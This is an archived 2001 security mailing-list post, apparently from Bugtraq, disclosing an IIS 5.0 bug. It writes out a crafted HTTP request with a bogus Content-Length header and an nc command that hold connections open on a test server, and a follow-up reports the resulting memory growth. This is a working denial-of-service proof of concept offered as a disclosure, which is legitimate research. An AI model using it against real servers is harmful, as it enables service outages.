Microsoft IIS/5 bogus Content-length bug Memory attack

From: Ivan Hernandez Puga (ivan.hernandezat_private)
Date: Tue Dec 11 2001 - 11:11:05 PST

Next message: the Pull: "Cross-Frame, About Pluggable Protocol, Security Zone Spoofing"

Previous message: http-equivat_private: "SPAMMERS DELIGHT: as feeble as feeble can be"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello. Me again

For something like 4322 open connections with the method described
before the Windows 2000 server grows it's memory from 404mb to 920mb
It's just a brute force hack and I suppose that competent application
software will handle it. 
Windows 2000 is with SP2 and IISLockDown tool + URLScan filters.
Nothing more now. 
Thanks 
Ivan Hernandez


-----Original Message-----
From: Ivan Hernandez Puga
Sent: Tuesday, December 11, 2001 12:32 PM
To: 'focus-msat_private'
Cc: bugtraqat_private
Subject: Microsoft IIS/5 bogus Content-length bug.

Let's say that it's a bug, not a security flaw, but probably can
lead into denial of service with some tweaking.
When you send a bad request to Microsoft IIS/5.0 server it gives
you the error and closes the connection, like when you fail to
authenticate.
Well... let's take a look to a normal request:
GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Authorization: Basic

And then let's add a "Content-Length: 5300643" field.

When you send the new request to the server ir hangs there waiting
something to happen and never closes the connection.

Let's try this:
$ cat " GET /testfile HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic" >bogus.txt

$ nc 192.168.0.10 80 <bogus.txt &
$ ps x
      PID    PPID    PGID     WINPID  TTY  UID    STIME COMMAND
      696       1     696        696  con  500 12:22:37
/usr/bin/bash
     2464     696    2464       2464  con  500 12:23:56 /usr/bin/nc
     2532     696    2532       1552  con  500 12:29:16 /usr/bin/ps

$ netstat -an |grep 192.168.0.10
  TCP    192.168.0.4:2479       192.168.0.10:80        ESTABLISHED

Now you have a waiting open connection. You can open as much as you
want. The server never stops the connections and I have seen no
timeout.

Well, I left this here.

Thanks for the time of reading

Ivan Hernandez

Next message: the Pull: "Cross-Frame, About Pluggable Protocol, Security Zone Spoofing"
Previous message: http-equivat_private: "SPAMMERS DELIGHT: as feeble as feeble can be"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Dec 11 2001 - 14:53:02 PST